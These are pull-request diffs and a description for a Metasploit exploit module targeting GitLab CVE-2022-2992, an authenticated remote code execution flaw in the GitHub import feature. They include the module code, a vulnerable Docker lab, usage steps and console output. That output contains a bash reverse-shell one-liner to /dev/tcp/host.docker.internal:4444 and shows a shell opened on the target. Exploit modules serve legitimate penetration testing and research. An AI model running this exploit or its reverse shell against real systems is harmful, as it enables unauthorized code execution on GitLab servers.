-    elsif req.uri.match(%r{/api/v3/repos/\w+/\w+})
+    when %r{/\w+/public.git/info/refs}
+      data = build_pkt_line_advertise(@refs)
+      headers.merge!('Content-Type' => 'application/x-git-upload-pack-advertisement')
+    when %r{/\w+/public.git/git-upload-pack}
+      data = build_pkt_line_sideband(@packfile)
+      headers.merge!({ 'Content-Type' => 'application/x-git-upload-pack-result' })
+    when %r{/api/v3/repos/\w+/\w+}
       data = {
         'default_branch' => {
           'to_s' => {
@@ -192,11 +226,6 @@ class MetasploitModule < Msf::Exploit::Remote
           }
         }
       }.to_json
-    elsif req.uri.starts_with?('/api/v3/rate_limit')
-      headers.merge!({
-        'X-RateLimit-Limit' => '100000',
-        'X-RateLimit-Remaining' => '100000'
-      })
     end
     send_response(cli, data, headers)
   end

--- a/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
+++ b/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
@@ -56,12 +56,11 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ]
         ],
-        'DefaultOptions' => { 'WfsDelay' => 20 },
         'DefaultTarget' => 0,
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
-          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+          'SideEffects' => [IOC_IN_LOGS]
         }
       )
     )
@@ -85,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def session_id
-    @session_id ||= Rex::Text.rand_text_alpha_lower(4)
+    @session_id ||=  Rex::Text.rand_text_hex(32)
   end
 
   def redis_payload(cmd)

--- a/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
+++ b/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
@@ -36,6 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'References' => [
           ['URL', 'https://hackerone.com/reports/1679624'],
           ['URL', 'https://github.com/redwaysecurity/CVEs/tree/main/CVE-2022-2992'], # PoC
+          ['URL', 'https://gitlab.com/gitlab-org/gitlab/-/issues/371884'],
           ['CVE', '2022-2992']
         ],
         'DisclosureDate' => '2022-10-06',
@@ -84,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def session_id
-    @session_id ||=  Rex::Text.rand_text_hex(32)
+    @session_id ||= Rex::Text.rand_text_hex(32)
   end
 
   def redis_payload(cmd)

--- a/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
+++ b/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
@@ -111,7 +111,12 @@ class MetasploitModule < Msf::Exploit::Remote
       version.between?(Rex::Version.new('15.3'), Rex::Version.new('15.3.2'))
     )
 
-    # TODO: - report this
+    report_vuln(
+      host: rhost,
+      name: name,
+      refs: references,
+      info: [version]
+    )
     return CheckCode::Vulnerable("Detected Gitlab version #{version} which is vulnerable")
   rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e
     return CheckCode::Unknown("#{e.class} - #{e.message}")

--- a/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
+++ b/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
@@ -44,6 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Platform' => ['unix', 'linux'],
         'Arch' => [ARCH_CMD],
         'Privileged' => false,
+        'Stance' => Msf::Exploit::Stance::Aggressive,
         'Targets' => [
           [
             'Unix Command',
@@ -70,8 +71,8 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('USERNAME', [true, 'The username to authenticate as', nil]),
         OptString.new('PASSWORD', [true, 'The password for the specified username', nil]),
-        OptString.new('NGROK_URL', [true, 'The Ngrok tunnel url', '/']),
         OptInt.new('IMPORT_DELAY', [true, 'Time to wait from the import task before try to trigger the payload', 5]),
+        OptAddress.new('URIHOST', [false, 'Host to use in GitHub import URL'])
       ]
     )
     deregister_options('GIT_URI')
@@ -102,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     self.cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie
 
-    vprint_status('Trying to get the gitlab version')
+    vprint_status('Trying to get the GitLab version')
 
     version = Rex::Version.new(gitlab_version)
 
@@ -137,6 +138,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    if Rex::Socket.is_internal?(srvhost_addr)
+      print_warning("#{srvhost_addr} is an internal address and will not work unless the target GitLab instance is using a non-default configuration.")
+    end
+
     setup_repo_structure
     start_service({
       'Uri' => {
@@ -161,15 +166,15 @@ class MetasploitModule < Msf::Exploit::Remote
     @group_id = gitlab_create_group(group_name, api_token)['id']
     fail_with(Failure::UnexpectedReply, 'Failed to create a new group') unless @group_id
     @redis_payload = redis_payload(cmd)
-    # import a repository from github
-    vprint_status('Importing a repository from github')
+    # import a repository from GitHub
+    vprint_status('Importing a repository from GitHub')
     @import_id = gitlab_import_github_repo(
       group_name: group_name,
-      github_hostname: datastore['NGROK_URL'],
+      github_hostname: get_uri,
       api_token: api_token
     )['id']
     # binding.pry
-    fail_with(Failure::UnexpectedReply, 'Failed to import a repository from github') unless @import_id
+    fail_with(Failure::UnexpectedReply, 'Failed to import a repository from GitHub') unless @import_id
     # wait for the import tasks to finish
     select(nil, nil, nil, datastore['IMPORT_DELAY'])
     # execute the payload
@@ -226,7 +231,7 @@ class MetasploitModule < Msf::Exploit::Remote
         id: id,
         name: name,
         full_name: "#{name}/name",
-        clone_url: "#{datastore['NGROK_URL']}/#{name}/public.git"
+        clone_url: "#{get_uri.gsub(%r{/+$}, '')}/#{name}/public.git"
       }.to_json
     when %r{/\w+/public.git/info/refs}
       data = build_pkt_line_advertise(@refs)

--- a/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
+++ b/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def api_token
-    @api_token ||= create_personal_access_token
+    @api_token ||= gitlab_create_personal_access_token
   end
 
   def session_id
@@ -101,7 +101,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    self.cookie = sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie
+    self.cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie
 
     vprint_status('Trying to get the GitLab version')
 
@@ -130,9 +130,9 @@ class MetasploitModule < Msf::Exploit::Remote
     super
     return unless @import_id
 
-    delete_group(@group_id, api_token)
-    revoke_personal_access_token(api_token)
-    sign_out
+    gitlab_delete_group(@group_id, api_token)
+    gitlab_revoke_personal_access_token(api_token)
+    gitlab_sign_out
   rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e
     print_error("#{e.class} - #{e.message}")
   end
@@ -159,16 +159,16 @@ class MetasploitModule < Msf::Exploit::Remote
   def execute_command(cmd, _opts = {})
     vprint_status("Executing command: #{cmd}")
     # due to the AutoCheck mixin and the keep_cookies option, the cookie might be already set
-    self.cookie = sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie
+    self.cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie
     vprint_status("Session ID: #{session_id}")
     vprint_status("Creating group #{group_name}")
     # We need group id for the cleanup method
-    @group_id = create_group(group_name, api_token)['id']
+    @group_id = gitlab_create_group(group_name, api_token)['id']
     fail_with(Failure::UnexpectedReply, 'Failed to create a new group') unless @group_id
     @redis_payload = redis_payload(cmd)
     # import a repository from GitHub
     vprint_status('Importing a repository from GitHub')
-    @import_id = import_github_repo(
+    @import_id = gitlab_import_github_repo(
       group_name: group_name,
       github_hostname: get_uri,
       api_token: api_token

--- a/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
+++ b/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def api_token
-    @api_token ||= gitlab_create_personal_access_token
+    @api_token ||= create_personal_access_token
   end
 
   def session_id
@@ -101,7 +101,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    self.cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie
+    self.cookie = sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie
 
     vprint_status('Trying to get the GitLab version')
 
@@ -130,9 +130,9 @@ class MetasploitModule < Msf::Exploit::Remote
     super
     return unless @import_id
 
-    gitlab_delete_group(@group_id, api_token)
-    gitlab_revoke_personal_access_token(api_token)
-    gitlab_sign_out
+    delete_group(@group_id, api_token)
+    revoke_personal_access_token(api_token)
+    sign_out
   rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e
     print_error("#{e.class} - #{e.message}")
   end
@@ -159,21 +159,21 @@ class MetasploitModule < Msf::Exploit::Remote
   def execute_command(cmd, _opts = {})
     vprint_status("Executing command: #{cmd}")
     # due to the AutoCheck mixin and the keep_cookies option, the cookie might be already set
-    self.cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie
+    self.cookie = sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie
     vprint_status("Session ID: #{session_id}")
     vprint_status("Creating group #{group_name}")
     # We need group id for the cleanup method
-    @group_id = gitlab_create_group(group_name, api_token)['id']
+    @group_id = create_group(group_name, api_token)['id']
     fail_with(Failure::UnexpectedReply, 'Failed to create a new group') unless @group_id
     @redis_payload = redis_payload(cmd)
     # import a repository from GitHub
     vprint_status('Importing a repository from GitHub')
-    @import_id = gitlab_import_github_repo(
+    @import_id = import_github_repo(
       group_name: group_name,
       github_hostname: get_uri,
       api_token: api_token
     )['id']
-    # binding.pry
+
     fail_with(Failure::UnexpectedReply, 'Failed to import a repository from GitHub') unless @import_id
     # wait for the import tasks to finish
     select(nil, nil, nil, datastore['IMPORT_DELAY'])
@@ -253,5 +253,4 @@ class MetasploitModule < Msf::Exploit::Remote
     end
     send_response(cli, data, headers)
   end
-
 end


### PR DESCRIPTION
This module exploit the CVE-2022-2992, which allow an authenticate user to achieve remote code execution through the feature Github Import in a server running a affected version of the Gitlab.

### Vulnerable Application

docker-compose.yml
```yml
services:
  gitlab:
    image: 'gitlab/gitlab-ee:15.3.1-ee.0'
    restart: always
    container_name: gitlab
    hostname: 'gitlab.example'
    network_mode: "bridge"
    ports:
      - '880:80'
      - '8443:443'
    volumes:
      - gitlab_config:/etc/gitlab
      - gitlab_logs:/var/log/gitlab
      - gitlab_data:/var/opt/gitlab
volumes:
  gitlab_config:
    driver: local
  gitlab_logs:
    driver: local
  gitlab_data:
    driver: local
``` 

```
$ docker-compose up
```

Wait for container to be "healthy" before continue. One can use [this](https://github.com/redwaysecurity/CVEs/blob/main/CVE-2022-2992/environment/healthy.sh) bash script to monitor the status.

```
$ # Creating personal access token for the root user
$ TOKEN=`tr -dc A-Za-z0-9 </dev/urandom | head -c 24 ; echo ''`
$ docker exec -e TOKEN=$TOKEN -it gitlab gitlab-rails runner "token = User.find_by_username('root').personal_access_tokens.create(scopes: [:sudo, :api], name: 'Automation token'); token.set_token(ENV['TOKEN']); token.save!"
$ # Using the personal access token from the root user a user.
$ USER=msf
$ PASSWORD=SuperStrongestGitlabPassword
curl --request POST --header "PRIVATE-TOKEN: $TOKEN" --data "skip_confirmation=true&email=$USER@gitlab.example&name=$USER&username=$USER&password=$PASSWORD" "http://gitlab.example:880/api/v4/users"

```

### Verification
Start a Ngrok tunnel
```
$ ngrok http 127.0.0.1:4567
```
 Start msfconsole

* `./msfconsole -q`
* use `multi/http/gitlab_github_import_rce_cve_2022_2992`
* set `rhosts` and `rport`
* set `USERNAME msf`
* set `PASSWORD SuperStrongestGitlabPassword`
* set `NGROK_URL`
* set `SRVPORT 4567`
 * run


###  Scenarios
#### Doker container running Gitlab 15.3.1 

```
msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) > options

Module options (exploit/multi/http/gitlab_github_import_rce_cve_2022_2992):

   Name       Current Setting                         Required  Description
   ----       ---------------                         --------  -----------
   NGROK_URL  https://f8f5-194-230-160-77.eu.ngrok.i  yes       The Ngrok tunnel url
              o
   PASSWORD   12345678                                yes       The password for the specified username
   Proxies    http:172.25.144.1:8080                  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.25.144.1                            yes       The target host(s), see https://github.com/rapid7/metasploit-framewor
                                                                k/wiki/Using-Metasploit
   RPORT      880                                     yes       The target port (TCP)
   SRVHOST    0.0.0.0                                 yes       The local host or network interface to listen on. This must be an add
                                                                ress on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    4567                                    yes       The local port to listen on.
   SSL        false                                   no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                            no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                                       yes       The base path to the gitlab application
   URIPATH                                            no        The URI to use for this exploit (default is random)
   USERNAME   heyder                                  yes       The username to authenticate as
   VHOST                                              no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting       Required  Description
   ----   ---------------       --------  -----------
   LHOST  host.docker.internal  yes       The listen address (an interface may be specified)
   LPORT  4444                  yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command
```

```
msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) > exploit

[+] bash -c '0<&212-;exec 212<>/dev/tcp/host.docker.internal/4444;sh <&212 >&212 2>&212'
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) >
[-] Handler failed to bind to 169.254.192.184:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[!] AutoCheck is disabled, proceeding with exploitation
[*] Using URL: http://host.docker.internal:4567/
[*] Executing command: bash -c '0<&151-;exec 151<>/dev/tcp/host.docker.internal/4444;sh <&151 >&151 2>&151'
[*] Session ID: lbid
[*] Creating group KQPhsIKX
[*] Importing a repository from github
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:58700) at 2022-11-19 15:23:06 +0100

msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) > sessions -1
[*] Starting interaction with 1...

id
uid=998(git) gid=998(git) groups=998(git)
pwd
/var/opt/gitlab/gitlab-rails/working
exit
[*] Server stopped.
[*] 172.25.144.1 - Command shell session 1 closed.
```
### TODO
- [x] Create documentation
- [ ] Ngrok wrapper ?
- [x] Module should "report" if vulnerable. By doing that the module can act as a "scan", given the chance for the user check multiple targets a save the result for further actions. 
- [x] Test others payloads - During the tests only bash payload worked. I won't have time dig more into this.